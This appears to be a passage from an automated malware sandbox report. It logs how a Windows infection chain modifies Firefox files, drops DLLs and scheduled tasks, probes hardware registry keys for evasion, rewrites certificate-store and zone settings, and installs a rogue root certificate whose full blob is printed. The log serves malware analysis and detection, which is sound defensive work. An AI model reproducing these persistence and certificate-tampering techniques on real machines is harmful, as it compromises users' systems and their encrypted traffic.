File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File created C:\Program Files (x86)\tegRANPZONsU2\DxJwRzxeQcEBA.dll C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File created C:\Program Files (x86)\nFLFFjqrQPUn\tiGcxqN.dll C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File created C:\Program Files (x86)\krdeMCnRKomDOvwVunR\FaxaBIX.dll C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File created C:\Program Files (x86)\krdeMCnRKomDOvwVunR\Qgobkqe.xml C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File created C:\Program Files (x86)\YLgKyOFzWxOqC\qcQCdBm.xml C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File created C:\Program Files (x86)\JipyTrDkU\xwzecB.dll C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File created C:\Program Files (x86)\JipyTrDkU\IybSyoS.xml C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\QdCYtDviHOrgqJLgZ.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\explortu.job C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe N/A
File created C:\Windows\Tasks\axplont.job C:\Users\Admin\1000004002\0869e0ea89.exe N/A
File created C:\Windows\Tasks\bqGGCwwWIommTRgeuN.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\WKALCIrwIEiqhKBsn.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\jiLwFdOzPPQiWLm.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zSED68.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zSED68.tmp\Install.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "7" C:\Users\Admin\AppData\Local\Temp\7zSED68.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Users\Admin\AppData\Local\Temp\7zSED68.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Users\Admin\AppData\Local\Temp\7zSED68.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{8a2ad7b7-0000-0000-0000-d01200000000}\MaxCapacity = "14116" C:\Users\Admin\AppData\Local\Temp\7zSED68.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Users\Admin\AppData\Local\Temp\7zSED68.tmp\Install.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Users\Admin\1000004002\0869e0ea89.exe N/A
N/A N/A C:\Users\Admin\1000004002\0869e0ea89.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\3ffd83c1a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\3ffd83c1a0.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\Pictures\ZwkvhQdl3d2GrfeBnBZDHvx1.exe N/A
N/A N/A C:\Users\Admin\Pictures\ZwkvhQdl3d2GrfeBnBZDHvx1.exe N/A
N/A N/A C:\Users\Admin\Pictures\ZwkvhQdl3d2GrfeBnBZDHvx1.exe N/A
N/A N/A C:\Users\Admin\Pictures\ZwkvhQdl3d2GrfeBnBZDHvx1.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\Pictures\79AxFRg8VecFbI3ZhvCwd6kV.exe N/A
N/A N/A C:\Users\Admin\Pictures\79AxFRg8VecFbI3ZhvCwd6kV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\79AxFRg8VecFbI3ZhvCwd6kV.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\Pictures\ZwkvhQdl3d2GrfeBnBZDHvx1.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
